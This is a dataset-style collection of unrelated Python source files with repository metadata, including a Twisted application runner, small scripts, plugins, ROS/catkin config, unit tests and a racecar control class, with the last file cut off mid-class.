ff44601100038aba800c66cb8d18e73458d7b4df | bdf86d69efc1c5b21950c316ddd078ad8a2f2ec0 | /venv/Lib/site-packages/twisted/application/runner/_runner.py | 66f1f11ee0f27fe0b61e6dfa8b9fee0befdaa03b | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | DuaNoDo/PythonProject | 543e153553c58e7174031b910fd6451399afcc81 | 2c5c8aa89dda4dec2ff4ca7171189788bf8b5f2c | refs/heads/master | 2020-05-07T22:22:29.878944 | 2019-06-14T07:44:35 | 2019-06-14T07:44:35 | 180,941,166 | 1 | 1 | null | 2019-06-04T06:27:29 | 2019-04-12T06:05:42 | Python | UTF-8 | Python | false | false | 5,763 | py | # -*- test-case-name: twisted.application.runner.test.test_runner -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Twisted application runner.
"""
from os import kill
from signal import SIGTERM
from sys import stderr
from attr import attrib, attrs, Factory
from twisted.logger import (
globalLogBeginner, textFileLogObserver,
FilteringLogObserver, LogLevelFilterPredicate,
LogLevel, Logger,
)
from ._exit import exit, ExitStatus
from ._pidfile import nonePIDFile, AlreadyRunningError, InvalidPIDFileError
@attrs(frozen=True)
class Runner(object):
    """
    Twisted application runner.
    @cvar _log: The logger attached to this class.
    @type _log: L{Logger}
    @ivar _reactor: The reactor to start and run the application in.
    @type _reactor: L{IReactorCore}
    @ivar _pidFile: The file to store the running process ID in.
    @type _pidFile: L{IPIDFile}
    @ivar _kill: Whether this runner should kill an existing running
        instance of the application.
    @type _kill: L{bool}
    @ivar _defaultLogLevel: The default log level to start the logging
        system with.
    @type _defaultLogLevel: L{constantly.NamedConstant} from L{LogLevel}
    @ivar _logFile: A file stream to write logging output to.
    @type _logFile: writable file-like object
    @ivar _fileLogObserverFactory: A factory for the file log observer to
        use when starting the logging system.
    @type _fileLogObserverFactory: callable that takes a single writable file-like object
        argument and returns a L{twisted.logger.FileLogObserver}
    @ivar _whenRunning: Hook to call after the reactor is running;
        this is where the application code that relies on the reactor gets
        called.
    @type _whenRunning: callable that takes the keyword arguments specified
        by C{whenRunningArguments}
    @ivar _whenRunningArguments: Keyword arguments to pass to
        C{whenRunning} when it is called.
    @type _whenRunningArguments: L{dict}
    @ivar _reactorExited: Hook to call after the reactor exits.
    @type _reactorExited: callable that takes the keyword arguments
        specified by C{reactorExitedArguments}
    @ivar _reactorExitedArguments: Keyword arguments to pass to
        C{reactorExited} when it is called.
    @type _reactorExitedArguments: L{dict}
    """
    _log = Logger()
    # attrs generates __init__ from these attrib declarations in order;
    # do not reorder them.
    _reactor = attrib()
    _pidFile = attrib(default=nonePIDFile)
    _kill = attrib(default=False)
    _defaultLogLevel = attrib(default=LogLevel.info)
    _logFile = attrib(default=stderr)
    _fileLogObserverFactory = attrib(default=textFileLogObserver)
    _whenRunning = attrib(default=lambda **_: None)
    _whenRunningArguments = attrib(default=Factory(dict))
    _reactorExited = attrib(default=lambda **_: None)
    _reactorExitedArguments = attrib(default=Factory(dict))
    def run(self):
        """
        Run this command.
        """
        pidFile = self._pidFile
        self.killIfRequested()
        try:
            # The PID file is held (as a context manager) for the whole
            # lifetime of the reactor.
            with pidFile:
                self.startLogging()
                self.startReactor()
                self.reactorExited()
        except AlreadyRunningError:
            exit(ExitStatus.EX_CONFIG, "Already running.")
            return # When testing, patched exit doesn't exit
    def killIfRequested(self):
        """
        If C{self._kill} is true, attempt to kill a running instance of the
        application.
        """
        pidFile = self._pidFile
        if self._kill:
            if pidFile is nonePIDFile:
                exit(ExitStatus.EX_USAGE, "No PID file specified.")
                return # When testing, patched exit doesn't exit
            try:
                pid = pidFile.read()
            except EnvironmentError:
                exit(ExitStatus.EX_IOERR, "Unable to read PID file.")
                return # When testing, patched exit doesn't exit
            except InvalidPIDFileError:
                exit(ExitStatus.EX_DATAERR, "Invalid PID file.")
                return # When testing, patched exit doesn't exit
            self.startLogging()
            self._log.info("Terminating process: {pid}", pid=pid)
            kill(pid, SIGTERM)
            exit(ExitStatus.EX_OK)
            return # When testing, patched exit doesn't exit
    def startLogging(self):
        """
        Start the L{twisted.logger} logging system.
        """
        logFile = self._logFile
        fileLogObserverFactory = self._fileLogObserverFactory
        fileLogObserver = fileLogObserverFactory(logFile)
        # Filter observer output by the configured default log level.
        logLevelPredicate = LogLevelFilterPredicate(
            defaultLogLevel=self._defaultLogLevel
        )
        filteringObserver = FilteringLogObserver(
            fileLogObserver, [logLevelPredicate]
        )
        globalLogBeginner.beginLoggingTo([filteringObserver])
    def startReactor(self):
        """
        Register C{self._whenRunning} with the reactor so that it is called
        once the reactor is running, then start the reactor.
        """
        self._reactor.callWhenRunning(self.whenRunning)
        self._log.info("Starting reactor...")
        self._reactor.run()
    def whenRunning(self):
        """
        Call C{self._whenRunning} with C{self._whenRunningArguments}.
        @note: This method is called after the reactor starts running.
        """
        self._whenRunning(**self._whenRunningArguments)
    def reactorExited(self):
        """
        Call C{self._reactorExited} with C{self._reactorExitedArguments}.
        @note: This method is called after the reactor exits.
        """
        self._reactorExited(**self._reactorExitedArguments)
| [
"[email protected]"
] | |
d1ac6305dbd6d50b835b3c72c2b048137df5ea1f | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/81/usersdata/212/47049/submittedfiles/dec2bin.py | 6411c5dd71bf68dde30b00d10c31f9fc65086a43 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | # -*- coding: utf-8 -*-
p=int(input('digite o valor do menor número:'))
q=int(input('digite o valor do maior número:'))
n=1%10
print(n)
| [
"[email protected]"
] | |
46451d297fa736664316b7c35106ff642cada2ff | cbb7f79a50b05e2ab670ae19bbd1c3b8dead437d | /dict_ordem.py | d24ab507f66b1828b5ff9371ba46aa626fa734e0 | [] | no_license | lfbessegato/Python_Avancado | 3b680d65fe543bd915b5798a85be1f7dadfad4c4 | bb73b99d64f92693a6fe71748f2c24aaabe7d4e1 | refs/heads/master | 2022-09-07T20:28:07.037656 | 2020-05-29T20:24:07 | 2020-05-29T20:24:07 | 265,316,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from collections import OrderedDict
# Ordered -> Mantém a Ordem
d = OrderedDict()
d['python'] = 10
d['java'] = 5
d['php'] = 6
d['C'] = 10
for key in d:
print(key, d[key])
| [
"[email protected]"
] | |
c5a55686d52aef4a636fcd08c7d52bca631af994 | 8c3ba133fa34cf2f936ba9176459690008e9e1fb | /imagepy/menus/Window/widgets_plgs.py | 4a05938af587349c3a114d2efe75198b21d28d8b | [
"BSD-2-Clause"
] | permissive | qixinbo/imagepy | fcd272b231b3f49fafd51425f46e826a73841c1f | a2722443dfddf2b0b81b44512427b8a273a7424c | refs/heads/master | 2023-03-16T15:58:57.330418 | 2022-09-03T13:35:46 | 2022-09-03T13:35:46 | 519,933,892 | 0 | 0 | BSD-4-Clause | 2022-08-01T02:02:26 | 2022-08-01T02:02:25 | null | UTF-8 | Python | false | false | 532 | py | from sciapp.action import Free
class Widgets(Free):
"""ImageKiller: derived from sciapp.action.Free"""
title = 'Widgets'
asyn = False
def run(self, para = None):
self.app.switch_widget()
class ToolBar(Free):
title = 'Toolbar'
asyn = False
def run(self, para = None):
self.app.switch_toolbar()
class TableWindow(Free):
"""ImageKiller: derived from sciapp.action.Free"""
title = 'Tables Window'
asyn = False
#process
def run(self, para = None):
self.app.switch_table()
plgs = [Widgets, ToolBar, TableWindow] | [
"[email protected]"
] | |
f6fa771d57a3a10af786708c35aa3393e0e40935 | 9c2ca939f29b861afec382cd17a462775a3974d0 | /run_worker.py | fcec489b5ac3ac725751dac7c59693090a0cba6f | [
"BSD-2-Clause"
] | permissive | merrlyne/gchatautorespond | 1e2009823e16289ea2cea709cfee5cd2a3e97459 | a7f8d7b715ca9851a65588a268ce39addb906b6d | refs/heads/master | 2020-03-20T12:49:18.882038 | 2018-03-29T18:38:58 | 2018-03-29T18:38:58 | 137,441,551 | 0 | 1 | null | 2018-06-15T04:38:49 | 2018-06-15T04:38:49 | null | UTF-8 | Python | false | false | 1,564 | py | from gevent import monkey
monkey.patch_all()
import django
django.setup()
import logging
from threading import Thread
from django.conf import settings
from gevent.wsgi import WSGIServer
from raven.contrib.flask import Sentry
from gchatautorespond.lib.chatworker.worker import Worker, app
from gchatautorespond.lib.chatworker.bot import ContextFilter
if __name__ == '__main__':
worker = Worker()
# Loading takes some time; don't block the api while it goes on.
thread = Thread(target=worker.load)
thread.start()
app.config['worker'] = worker
app.config['LOGGER_NAME'] = 'gchatautorespond.worker'
app.config.update({'SENTRY_' + k.upper(): v for (k, v) in settings.RAVEN_CONFIG.items()
if k != 'dsn'})
# Add the ContextFilter to all stream handlers.
# It can't be attached to the loggers since that wouldn't handle subloggers,
# nor can it be attached to null/sentry handlers, since it'd produce output twice.
handlers = set()
for logger_name in settings.LOGGING['loggers']:
logger = logging.getLogger(logger_name)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
handlers.add(handler)
for handler in handlers:
handler.addFilter(ContextFilter)
if 'dsn' in settings.RAVEN_CONFIG:
sentry = Sentry(app, dsn=settings.RAVEN_CONFIG['dsn'],
logging=True, level=logging.ERROR)
server = WSGIServer(('127.0.0.1', settings.WORKER_PORT), app)
server.serve_forever()
| [
"[email protected]"
] | |
b2a8e001c69a95a4fb2a947d732d78d6d7d8c012 | 632b94beca62f7c8af5ae1d1e8e095a352600429 | /build/ros_controllers/ros_controllers/position_controllers/catkin_generated/pkg.installspace.context.pc.py | 4ddc4e67bff606fc70fdb62976ffda91a4cd6eb2 | [] | no_license | Haoran-Zhao/US_UR3 | d9eb17a7eceed75bc623be4f4db417a38f5a9f8d | a0c25e1daf613bb45dbd08075e3185cb9cd03657 | refs/heads/master | 2020-08-31T07:02:45.403001 | 2020-05-27T16:58:52 | 2020-05-27T16:58:52 | 218,629,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 507 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "controller_interface;forward_command_controller".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lposition_controllers".split(';') if "-lposition_controllers" != "" else []
PROJECT_NAME = "position_controllers"
PROJECT_SPACE_DIR = "/home/haoran/US_UR3/install"
PROJECT_VERSION = "0.13.6"
| [
"[email protected]"
] | |
2fea31c0cd40ed40aa5a152c571bd75391e2bf24 | b47f2e3f3298388b1bcab3213bef42682985135e | /experiments/heat-3d/tmp_files/6909.py | efaecf45f0b280f386864f84a69acd803b7e70e3 | [
"BSD-2-Clause"
] | permissive | LoopTilingBenchmark/benchmark | 29cc9f845d323431e3d40e878cbfc6d1aad1f260 | 52a3d2e70216552a498fd91de02a2fa9cb62122c | refs/heads/master | 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/heat-3d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/heat-3d/tmp_files/6909.c')
procedure('kernel_heat_3d')
loop(0)
tile(0,2,8,2)
tile(0,4,64,3)
tile(0,6,128,4)
tile(1,2,8,2)
tile(1,4,64,3)
tile(1,6,128,4)
| [
"[email protected]"
] | |
c6061d5f295fed6a46483bf27ca17b45bf838027 | 4c7ea6295a487ec18543e82f66e08a3a2a2fd124 | /apps/logs/action/action_monster_level_reward.py | 8a7e07ee77cf001a6d538be71ca87a390ab9e53c | [] | no_license | robot-nan/GameLogServer | 16217689d88ac5353a61881b03adb1b372cc3e16 | ff2afd6d29e9dce6157a66ff62b4d1ea97d04184 | refs/heads/master | 2021-11-07T21:27:30.494271 | 2015-09-23T15:01:55 | 2015-09-23T15:01:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | # -*- coding:utf-8 -*-
"""
宠物等级奖励
"""
from apps.logs.action import action_base
from apps.utils import game_define
def log(user, gold, stone, equip_str, item_str):
"""
输出日志
"""
action = game_define.EVENT_ACTION_GET_MONSTER_LEVEL
cur_gold = user.player.get_gold()
cur_stone = user.player.get_stone()
log_lst = action_base.log_base(user)
log_lst.append(str(action))
log_lst.append(str(gold))
log_lst.append(str(cur_gold))
log_lst.append(str(stone))
log_lst.append(str(cur_stone))
log_lst.append(str(equip_str))
log_lst.append(str(item_str))
log_str = '$$'.join(log_lst)
return log_str
def parse(log_part_lst):
"""
解析
"""
result = dict()
result['action'] = int(log_part_lst[0])
result['add_gold'] = int(log_part_lst[1])
result['cur_gold'] = int(log_part_lst[2])
result['add_stone'] = int(log_part_lst[3])
result['cur_stone'] = int(log_part_lst[4])
result['add_equip_list'] = action_base.get_val(log_part_lst, 5, [], True)
result['add_item_list'] = action_base.get_val(log_part_lst, 6, [], True)
result['old_gold'] = result['cur_gold'] - result['add_gold']
result['old_stone'] = result['cur_stone'] - result['add_stone']
return result | [
"[email protected]"
] | |
3bc24697dee04be43497c122b3028c6926362734 | b213fbd2f4f628aa0f2387c846673ac68e18aa91 | /Binary_Search/600.py | 4e544b47614dc36d42421f95f4fbc7fd3ea4e675 | [
"MIT"
] | permissive | wilbertgeng/LintCode_exercise | 94309b4451e34f1931fce6c2ae90d0c2e7c41d35 | e7a343b746e98ca3b4bc7b36655af7291f3150db | refs/heads/main | 2023-05-13T06:06:50.887791 | 2021-05-26T20:33:51 | 2021-05-26T20:33:51 | 347,850,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,701 | py | """600. Smallest Rectangle Enclosing Black Pixels
"""
class Solution:
"""
@param image: a binary matrix with '0' and '1'
@param x: the location of one of the black pixels
@param y: the location of one of the black pixels
@return: an integer
"""
def minArea(self, image, x, y):
# write your code here
if not image or not image[0]:
return 0
m = len(image)
n = len(image[0])
left = self.findFirst(image, 0, y, self.checkColumn)
right = self.findLast(image, y, n - 1, self.checkColumn)
up = self.findFirst(image, 0, x, self.checkRow)
down = self.findLast(image, x, m - 1, self.checkRow)
return (right - left + 1) * (down - up + 1)
def findFirst(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
start = mid
else:
end = mid
if checkFunc(image, start):
return start
return end
def findLast(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
end = mid
else:
start = mid
if checkFunc(image, end):
return end
return start
def checkRow(self, image, row):
for i in range(len(image[0])):
if image[row][i] == "1":
return True
return False
def checkColumn(self, image, col):
for i in range(len(image)):
if image[i][col] == "1":
return True
return False
| [
"[email protected]"
] | |
21a3244c094f2c6fdba9b385874dde119094b631 | 525690b220962de7f6253dd1dc557717cffc3441 | /openstack/tests/unit/cloud_eye/test_cloudeye_service.py | 35b73816fe5fdd9edf0eaeabe9ed72d39d48f02c | [
"Apache-2.0"
] | permissive | huaweicloudsdk/sdk-python | bb8dc2bc195d0bdaddf13fef484e3f28aeb2681f | 60d75438d71ffb7998f5dc407ffa890cc98d3171 | refs/heads/master | 2021-06-05T00:04:59.030371 | 2018-09-30T09:40:49 | 2018-09-30T09:40:49 | 110,813,153 | 20 | 18 | NOASSERTION | 2020-07-23T17:01:59 | 2017-11-15T09:31:50 | Python | UTF-8 | Python | false | false | 1,102 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from openstack.cloud_eye import cloud_eye_service
class TestCloudEyeService(testtools.TestCase):
def test_service(self):
sot = cloud_eye_service.CloudEyeService()
self.assertEqual('cloud-eye', sot.service_type)
self.assertEqual('public', sot.interface)
self.assertIsNone(sot.region)
self.assertIsNone(sot.service_name)
self.assertEqual(1, len(sot.valid_versions))
self.assertEqual('v1', sot.valid_versions[0].module)
self.assertEqual('v1', sot.valid_versions[0].path)
| [
"[email protected]"
] | |
9005aa6da759029734d49699d61f6dfb82e382ee | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_subordinating.py | f414e402006d840f8543ad90d26aa0594767e83c | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py |
from xai.brain.wordbase.adjectives._subordinate import _SUBORDINATE
#calss header
class _SUBORDINATING(_SUBORDINATE, ):
def __init__(self,):
_SUBORDINATE.__init__(self)
self.name = "SUBORDINATING"
self.specie = 'adjectives'
self.basic = "subordinate"
self.jsondata = {}
| [
"[email protected]"
] | |
e4f116f2d1e3e8c08ce2c7c35289d60e7a2455e5 | 3b2940c38412e5216527e35093396470060cca2f | /top/api/rest/SimbaAdgroupsChangedGetRequest.py | 5b87c69b8afb5cee0f9b6ef7edd9ba1abccebb0d | [] | no_license | akingthink/goods | 842eb09daddc2611868b01ebd6e330e5dd7d50be | ffdb5868a8df5c2935fc6142edcdf4c661c84dca | refs/heads/master | 2021-01-10T14:22:54.061570 | 2016-03-04T09:48:24 | 2016-03-04T09:48:24 | 45,093,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | '''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class SimbaAdgroupsChangedGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.nick = None
self.page_no = None
self.page_size = None
self.start_time = None
def getapiname(self):
return 'taobao.simba.adgroups.changed.get'
| [
"[email protected]"
] | |
284b16862546a04753ca39ee352a14563fc28272 | eaf97194e79c31d80f7786b64bbf621581a95dec | /example.py | bba3baa0753070fdc4a03e7eb9cbacab6300db59 | [] | no_license | codesharedot/levolution-price | 333902c32137f9a82bd9d21b26575d646e0f4bb9 | 60c9d52fa42190e4fa929ead32ca611766906005 | refs/heads/master | 2020-08-02T14:26:47.832555 | 2019-09-27T19:27:47 | 2019-09-27T19:27:47 | 211,388,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | import requests
import json
from forex_python.converter import CurrencyRates
import os
c = CurrencyRates()
rate = c.get_rate('USD', 'EUR')
print(rate)
levolution_api_url = 'https://api.coinmarketcap.com/v1/ticker/levolution/'
response = requests.get(levolution_api_url)
response_json = response.json()
print(response_json)
for coin in response.json():
price = coin.get("price_usd", "U$S Price not provided")
coin_price = float(("{0:.2f}").format(float(price)))
print("$ " + str(coin_price))
coin_price_eur = float(("{0:.2f}").format(float(price)*rate))
print("€ " + str(coin_price_eur))
| [
"[email protected]"
] | |
df3847d46c128ea4255e64467cb577d4e348b21b | 469e3e8de616263bab857df1050d426f40c30d5c | /module3.py | 5d847f0e4e820befd42f51495c91329a0d3b6499 | [
"MIT"
] | permissive | listenzcc/QuickPythonConfig | d487e3c35e906f84503d8992152ee79909d0da30 | ff883c1dd2b7a23a114ec794e3d711fd5d1d15c1 | refs/heads/main | 2023-01-07T20:30:39.060803 | 2020-11-10T08:52:10 | 2020-11-10T08:52:10 | 306,575,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | # Example of using customized Config object
from Package.defines import Config
config = Config()
config.reload_logger('develop')
config.reload_cfg()
def main():
print('---------------------------------------------------------')
print(config.peek())
config.set('Module 3', 'says', 'It should be a brand new configure')
print(config.peek())
| [
"[email protected]"
] | |
6f45e31cd38fe22467cfb6b9bef6d61c3073ffef | 38c76d29799896a8335bd83b6220acd71d5d8bed | /pyeuler/p053.py | 32ec8ddbb6ba17ace49313419244944a5c2dde50 | [] | no_license | oozk/pyeuler | c010505624bb95043883faa55a776d954c0496dc | 74fd549985722f6d53a1394179d094a106c70689 | refs/heads/master | 2023-04-13T17:50:23.187918 | 2023-04-05T13:00:44 | 2023-04-05T13:00:44 | 261,848,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | #!/usr/bin/env python3
###
# Problem 53
# https://projecteuler.net/problem=53
###
from math import factorial
def p053(l):
factorials = dict((i, factorial(i)) for i in range(0, l+1))
n_choose_r = lambda n, r: factorials[n] / factorials[r] / factorials[n-r]
return sum(1 for n in range(1, l+1) for r in range(1, n) if n_choose_r(n, r) > 1e6)
print(p053(100))
| [
"[email protected]"
] | |
d8a83a203ad3e39efa214b7786b7be640e6c5c2d | af192ea16aad4264a92039d594d72acca91d0e33 | /tests/tests.py | d329884aa00948981f710044b18f363c5eea0ca8 | [
"MIT"
] | permissive | TakumiHQ/emoji-unicode | ceed81325829e2c44b6d1b04c4dbc7257cc95c86 | 85e8193f05f822641a58eb539b765481b084f83c | refs/heads/master | 2021-01-18T16:08:52.817116 | 2015-11-20T13:10:44 | 2015-11-20T13:10:44 | 66,449,921 | 1 | 0 | null | 2016-08-24T09:17:27 | 2016-08-24T09:17:27 | null | UTF-8 | Python | false | false | 6,812 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import logging
import os
import json
import io
from emoji_unicode import replace, normalize, Emoji
from emoji_unicode.utils import code_point_to_unicode, unicode_to_code_point
from emoji_unicode import data_parser
logging.disable(logging.CRITICAL)
DIR = os.path.dirname(__file__)
FIXTURES = os.path.join(DIR, 'fixtures')
EMOJI_PRETTY_JSON = None
def _get_emoji_pretty():
global EMOJI_PRETTY_JSON
if EMOJI_PRETTY_JSON is not None:
return EMOJI_PRETTY_JSON
with io.open(os.path.join(FIXTURES, 'emoji_pretty.json'), encoding='utf-8') as fh:
EMOJI_PRETTY_JSON = fh.read()
return EMOJI_PRETTY_JSON
def get_emoji_pretty():
return json.loads(_get_emoji_pretty())
def code_points_to_unicode(code_points):
return ''.join(
code_point_to_unicode(p)
for p in code_points.split('-')
)
def get_emojis(include_skin_variations=True, include_variations=True):
# todo: include variations (emoji + emo_variation), android doesn't use them, check iOS
emojis = []
for e in get_emoji_pretty():
emojis.append({
'unicode': code_points_to_unicode(e['unified']),
'code_point': e['unified'],
'short_name': e['short_name']
})
if include_skin_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('skin_variations', {}).keys()
)
if include_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('variations', [])
)
return emojis
def get_emojis_unicode(**kw):
return [e['unicode'] for e in get_emojis(**kw)]
class MetaTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_points_to_unicode(self):
self.assertEqual(
code_points_to_unicode('1F58B-1F58B-1F58B'),
'\U0001f58b\U0001f58b\U0001f58b'
)
def test_get_emojis(self):
self.assertEqual(len(get_emojis()), 1736)
self.assertEqual(len(get_emojis(include_skin_variations=False)), 1416)
self.assertEqual(len(get_emojis(include_variations=False)), 1619)
def test_get_emojis_unicode(self):
self.assertEqual(len(get_emojis_unicode()), 1736)
self.assertEqual(len(get_emojis_unicode(include_skin_variations=False)), 1416)
self.assertEqual(len(get_emojis(include_variations=False)), 1619)
class UtilsTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_point_to_unicode(self):
self.assertEqual(
code_point_to_unicode('1F58B'),
'\U0001f58b'
)
def test_unicode_to_code_point(self):
self.assertEqual(
unicode_to_code_point('\U0001f58b'),
'1F58B'.lower()
)
class ModelEmojiTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_unicode(self):
emoji = Emoji(unicode='foo')
self.assertEqual(emoji.unicode, 'foo')
def test_code_points(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(emoji.code_points, '1F58B-1F58B-1F58B'.lower())
def test_as_map(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(
emoji.as_map(),
[('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b')]
)
class ParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_replace(self):
"""
It should replace all emojis
"""
emojis = get_emojis()
# With no spaces will fail due to fitzpatrick tone being a modifier and also a emoji
txt = ' '.join(get_emojis_unicode())
txt_code_points = ' '.join(normalize(e['code_point']) for e in emojis)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_with_no_fitz(self):
"""
It should replace no-spaced emojis, excluding fitzpatrick tone emojis
"""
emojis = get_emojis()
txt = ''.join(
e['unicode']
for e in emojis
if 'skin-tone' not in e['short_name']
)
txt_code_points = ''.join(
normalize(e['code_point'])
for e in emojis
if 'skin-tone' not in e['short_name']
)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_remove(self):
txt = ''.join(get_emojis_unicode())
res = replace(txt, lambda emoji: '')
self.assertEqual(res, '')
def test_replace_digits(self):
"""
It should not match single digits
"""
txt = '#*0123456789'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_replace_text_variations(self):
"""
It should not match emojis with text variation
"""
txt = '\u203C\uFE0E'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_normalize(self):
self.assertEqual(normalize('00A900'), 'a900')
def test_normalize_variations(self):
self.assertEqual(normalize('00A9-FE0F-200D-F00'), 'a9-f00')
def test_normalize_separator(self):
self.assertEqual(normalize('00A9_FE0F_200D_F00', separator='_'), 'a9_f00')
class DataParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_parse(self):
res = set(data_parser.parse())
self.assertTrue('\u00A9' in res)
self.assertTrue('\u2194-\u2199' in res) # range
def test_read_template(self):
template = data_parser.read_template()
self.assertTrue('{{code_points}}' in template)
self.assertTrue('RE_PATTERN_TEMPLATE' in template)
def test_render_template(self):
code_points = data_parser.parse()
template = data_parser.read_template()
rendered_template = data_parser.render_template(template, code_points)
self.assertTrue('{{code_points}}' not in rendered_template)
self.assertTrue('RE_PATTERN_TEMPLATE' in rendered_template)
| [
"[email protected]"
] | |
81692c3527f89a21d770bcf0dfe69059814ffe59 | 64f5c0f229e1b1186f12d75b4ba21c07adfcf152 | /index/models.py | fc2791e3989c627bacd03d10534b92d43824f717 | [] | no_license | Emehinola/intouch | 22dd3a81c935956914362604b8fd60d6d7cd2a46 | d370a48c21b93aed797c32a0621c3fa8bda89857 | refs/heads/master | 2023-01-24T22:37:41.862324 | 2020-12-13T08:54:55 | 2020-12-13T08:54:55 | 318,006,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | from django.db import models
# Create your models here.
# home page view, i.e the surveys views
class HomeViewCount(models.Model):
views = models.IntegerField(default=0) # number of views or visits
time = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-time']
verbose_name_plural = 'Views'
def __str__(self):
return f'{self.views}'
| [
"[email protected]"
] | |
e0a422afafd0c518668c019f26bccbc9e6a9bb01 | 6572f29c4472f1bd131dfb0fba441cb5b641ec83 | /django/mysite_personal_models/blog/urls.py | 6bdac35817b4968ca9cf7207271375c46c4feef1 | [] | no_license | kan-abhulimen/jango-training | 1ccbe04c9f2f481d4482e9fdfd50b1a5b43cc7ae | 734087392cd9635f00596a7955882f4849883930 | refs/heads/master | 2020-03-07T18:37:44.332426 | 2018-01-27T16:11:29 | 2018-01-27T16:11:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from django.conf.urls import url, include
from django.views.generic import ListView, DetailView
from blog.models import Post
urlpatterns = [
url(r'^$', ListView.as_view(
queryset=Post.objects.all().order_by("-date")[:25],
template_name="blog/blog.html")),
url(r'^(?P<pk>\d+)$', DetailView.as_view(
model = Post,
template_name="blog/post.html")),
]
| [
"[email protected]"
] | |
c442740a0bcbc288556a64daa57037c8a3f469ab | d0326c87cda35a4c80d1bb137894a33ca3f1bcc9 | /jetracer/nvidia_racecar.py | ec1631454f4df2f3fb9181022e6a30c9bf3caab6 | [
"MIT"
] | permissive | tokk-nv/jetracer | 5a36fcf809348b609331d369d71cca20010c954a | e83f11522f75d5f89486442ce2e36624e20970a7 | refs/heads/master | 2023-07-03T21:58:25.670731 | 2021-08-09T23:33:58 | 2021-08-09T23:33:58 | 321,274,145 | 1 | 0 | MIT | 2021-06-01T20:47:28 | 2020-12-14T07:59:07 | Jupyter Notebook | UTF-8 | Python | false | false | 1,115 | py | from .racecar import Racecar
import traitlets
from adafruit_servokit import ServoKit
class NvidiaRacecar(Racecar):
i2c_address = traitlets.Integer(default_value=0x40)
steering_gain = traitlets.Float(default_value=-0.65)
steering_offset = traitlets.Float(default_value=0)
steering_channel = traitlets.Integer(default_value=0)
throttle_gain = traitlets.Float(default_value=0.8)
throttle_channel = traitlets.Integer(default_value=1)
def __init__(self, *args, **kwargs):
super(NvidiaRacecar, self).__init__(*args, **kwargs)
